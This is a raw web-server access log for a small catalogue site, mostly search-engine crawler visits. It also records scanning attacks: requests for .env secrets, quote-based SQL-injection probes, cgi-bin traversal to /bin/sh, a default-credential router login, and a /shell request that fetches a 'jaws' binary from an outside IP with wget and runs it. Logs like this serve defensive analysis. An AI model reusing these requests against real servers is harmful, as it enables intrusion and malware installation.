114.119.149.109 - - [04/Oct/2024:05:25:29 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.41 - - [04/Oct/2024:05:31:52 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:05:31:53 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:05:40:24 +0200] "GET /info.php?sifra=51151&skupina=100 HTTP/1.1" 200 17613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:05:57:35 +0200] "GET /skupine.php?skupina=40&stran=2 HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:06:28:43 +0200] "GET /info.php?sifra=50155&skupina=40 HTTP/1.1" 200 17512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:06:59:22 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.196.128.13 - - [04/Oct/2024:07:02:31 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [04/Oct/2024:07:23:18 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.163.207.12 - - [04/Oct/2024:07:58:35 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.44 - - [04/Oct/2024:09:01:27 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:09:01:27 +0200] "GET /info.php?sifra=AM%2044&skupina=0 HTTP/1.1" 200 16996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.210 - - [04/Oct/2024:09:20:11 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [04/Oct/2024:09:49:22 +0200] "GET /info.php?sifra=4RPP&skupina=31 HTTP/1.1" 200 17705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.142.125.204 - - [04/Oct/2024:09:59:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.204 - - [04/Oct/2024:09:59:44 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
35.203.211.27 - - [04/Oct/2024:10:10:02 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.79.147.226 - - [04/Oct/2024:10:44:39 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
64.23.171.117 - - [04/Oct/2024:10:46:35 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
64.23.171.117 - - [04/Oct/2024:10:46:35 +0200] "GET /" 400 474 "-" "-"
4.237.68.225 - - [04/Oct/2024:10:57:38 +0200] "GET /skupine.php?skupina=100%27&stran=3 HTTP/1.1" 200 13089 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [04/Oct/2024:10:57:39 +0200] "GET /skupine.php?skupina=100&stran=3%27 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
66.249.66.43 - - [04/Oct/2024:12:04:28 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:12:24:28 +0200] "GET /skupine.php?skupina=131 HTTP/1.1" 200 15427 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:12:50:09 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
66.249.66.42 - - [04/Oct/2024:13:45:46 +0200] "GET /style.css HTTP/1.1" 200 11488 "https://212.44.99.48/skupine.php?skupina=34&stran=2" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:14:22:00 +0200] "GET /skupine.php?skupina=82 HTTP/1.1" 200 27509 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:14:28:18 +0200] "GET /skupine.php?skupina=48 HTTP/1.1" 200 18244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:14:28:22 +0200] "GET /style.css HTTP/1.1" 200 11488 "https://212.44.99.48/skupine.php?skupina=48" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:14:46:49 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
20.151.78.25 - - [04/Oct/2024:14:58:50 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
20.151.78.25 - - [04/Oct/2024:14:58:57 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
66.249.66.44 - - [04/Oct/2024:16:11:42 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.138.35 - - [04/Oct/2024:16:14:42 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [04/Oct/2024:16:14:42 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [04/Oct/2024:16:14:43 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
178.215.236.240 - - [04/Oct/2024:16:31:06 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
66.249.66.44 - - [04/Oct/2024:16:43:31 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.71.75.79 - - [04/Oct/2024:17:13:33 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
82.79.67.194 - - [04/Oct/2024:17:29:53 +0200] "\x03" 200 16604 "-" "-"
66.249.66.42 - - [04/Oct/2024:18:07:32 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.219.3.243 - - [04/Oct/2024:18:09:22 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux i686; rv:54.0) Gecko/20100101 Firefox/54.0"
66.249.66.42 - - [04/Oct/2024:18:10:32 +0200] "GET /info.php?sifra=AM%2065&skupina=0 HTTP/1.1" 200 16996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.216 - - [04/Oct/2024:18:11:09 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [04/Oct/2024:18:16:33 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:18:16:34 +0200] "GET /skupine.php?skupina=34&stran=2 HTTP/1.1" 200 25744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:19:07:09 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
45.95.169.130 - - [04/Oct/2024:19:47:02 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
45.95.169.130 - - [04/Oct/2024:19:47:10 +0200] "POST /index.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
66.249.66.44 - - [04/Oct/2024:20:26:31 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
130.164.187.47 - - [04/Oct/2024:22:16:01 +0200] "GET / HTTP/1.0" 200 16604 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [04/Oct/2024:22:26:44 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:22:26:44 +0200] "GET /info.php?sifra=51151&skupina=100 HTTP/1.1" 200 17613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:22:40:01 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:22:40:21 +0200] "GET /info.php?sifra=502986&skupina=42 HTTP/1.1" 200 18920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:22:53:04 +0200] "GET /info.php?sifra=990980&skupina=39 HTTP/1.1" 200 17850 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.216.185.176 - - [04/Oct/2024:22:59:31 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
66.249.66.43 - - [04/Oct/2024:23:02:10 +0200] "GET /info.php?sifra=95SNS&skupina=0 HTTP/1.1" 200 17019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.41 - - [04/Oct/2024:23:29:23 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:00:16:12 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:02:40:27 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:03:10:33 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:03:16:33 +0200] "GET /info.php?sifra=V-110&skupina=0 HTTP/1.1" 200 17271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:03:29:42 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.83.220.185 - - [04/Oct/2024:04:30:11 +0200] "GET /skupine.php?skupina=31 HTTP/1.1" 200 25701 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
45.83.220.185 - - [04/Oct/2024:04:30:11 +0200] "GET /skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Linux; Android 11; KB2003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /? HTTP/1.1" 200 20819 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /skupine.php?skupina=31'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /skupine.php?skupina=34'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=40'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=42'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=54'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=63'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=64'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=71'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=77'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=82'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=124'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=131'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=133'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /skupine.php?skupina=136'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /info.php?sifra=dbm020&skupina=0'123 HTTP/1.1" 200 17540 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /info.php?sifra=kos 001&skupina=0'123 HTTP/1.1" 200 16899 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:43 +0200] "GET /info.php?sifra=23000&skupina=0'123 HTTP/1.1" 200 17211 "-" "Go-http-client/1.1"
66.249.66.43 - - [04/Oct/2024:05:04:24 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
41.40.34.65 - - [04/Oct/2024:05:11:52 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.80.139.104/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
114.119.152.216 - - [04/Oct/2024:05:24:17 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.149.109 - - [04/Oct/2024:05:25:29 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.41 - - [04/Oct/2024:05:31:52 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:05:31:53 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:05:40:24 +0200] "GET /info.php?sifra=51151&skupina=100 HTTP/1.1" 200 17613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:05:57:35 +0200] "GET /skupine.php?skupina=40&stran=2 HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:06:28:43 +0200] "GET /info.php?sifra=50155&skupina=40 HTTP/1.1" 200 17512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:06:59:22 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.196.128.13 - - [04/Oct/2024:07:02:31 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [04/Oct/2024:07:23:18 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.163.207.12 - - [04/Oct/2024:07:58:35 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.44 - - [04/Oct/2024:09:01:27 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:09:01:27 +0200] "GET /info.php?sifra=AM%2044&skupina=0 HTTP/1.1" 200 16996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.210 - - [04/Oct/2024:09:20:11 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [04/Oct/2024:09:49:22 +0200] "GET /info.php?sifra=4RPP&skupina=31 HTTP/1.1" 200 17705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.142.125.204 - - [04/Oct/2024:09:59:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.204 - - [04/Oct/2024:09:59:44 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
35.203.211.27 - - [04/Oct/2024:10:10:02 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.79.147.226 - - [04/Oct/2024:10:44:39 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
64.23.171.117 - - [04/Oct/2024:10:46:35 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
64.23.171.117 - - [04/Oct/2024:10:46:35 +0200] "GET /" 400 474 "-" "-"
4.237.68.225 - - [04/Oct/2024:10:57:38 +0200] "GET /skupine.php?skupina=100%27&stran=3 HTTP/1.1" 200 13089 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [04/Oct/2024:10:57:39 +0200] "GET /skupine.php?skupina=100&stran=3%27 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
